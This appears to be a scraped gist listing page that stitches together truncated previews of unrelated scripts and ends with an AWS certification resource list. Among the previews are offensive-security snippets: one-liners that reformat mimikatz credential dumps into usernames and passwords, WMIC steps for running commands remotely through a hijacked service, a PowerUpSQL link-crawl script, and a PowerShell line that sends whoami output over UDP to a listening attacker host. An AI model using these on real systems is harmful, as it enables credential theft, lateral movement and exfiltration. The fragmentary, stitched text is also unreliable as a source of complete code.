| //Invoke-WebRequest in Powershell - manually whitelist legit content first: | |
| Mozilla/*WindowsPowerShell/* | |
| System.Net.WebClient.DownloadFile(): | |
| None | |
| //Start-BitsTransfer - manually whitelist legit content first: | |
| Microsoft BITS/* | |
| //certutil.exe - manually whitelist legit content first: |
| Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password" | |
| First, before using these parsers, run: "dos2unix mimikatz_dump.txt" | |
| Mimikatz 1.0: | |
| cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u | |
| Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons): |
| #!/bin/bash | |
| IF_IN="eth0" | |
| IF_OUT="wlan0" | |
| SUB="192.168.100" | |
| echo "[+] Creating DHCP server config." | |
| cat <<EOF > /etc/dhcp/dhcp.${IF_IN}.conf | |
| option routers ${SUB}.1; | |
| option domain-name-servers ${SUB}.1; | |
| default-lease-time 14440; |
| #!/bin/bash | |
| IF_IN="eth0" | |
| IF_OUT="wlan0" | |
| SUB="192.168.100" | |
| echo "[+] Bringing interface ${IF_IN} down" | |
| ip addr del ${SUB}.1/24 dev ${IF_IN} | |
| ip link set dev ${IF_IN} down | |
| echo "[+] Removing iptable rules" |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ | |
| # | |
| # Linux Audit Daemon - Best Practice Configuration | |
| # /etc/audit/audit.rules | |
| # | |
| # Compiled by Florian Roth |
| #!/bin/bash | |
| python3 bot.py |
| # https://github.com/NetSPI/PowerUpSQL | |
| # Get-SQLServerLinkCrawl -verbose -instance "[ip-address]\SQLSERVER2008" -username 'guest' -password 'guest' | export-clixml c:\temp\links.xml | |
| $List = Import-CliXml 'C:\temp\links.xml' | |
| $Servers = $List | select name,version,path,user,sysadmin -unique | where name -ne 'broken link' | |
| $Outnodes = @() | |
| $Outpaths = @() | |
| foreach($Server in $Servers){ | |
| $Outnodes += "$([string][math]::abs($Server.Name.GetHashCode())),$($Server.Name),$($Server.Version)" |
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
| # On your host: | |
| # $ nc -lnvup 53 | |
| # Replace <HOSTIP> with ip of the listening machine | |
| powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" | |
A curated list of AWS resources to prepare for the AWS Certifications
A curated list of awesome AWS resources you need to prepare for the all 5 AWS Certifications. This gist will include: open source repos, blogs & blogposts, ebooks, PDF, whitepapers, video courses, free lecture, slides, sample test and many other resources.
Index:
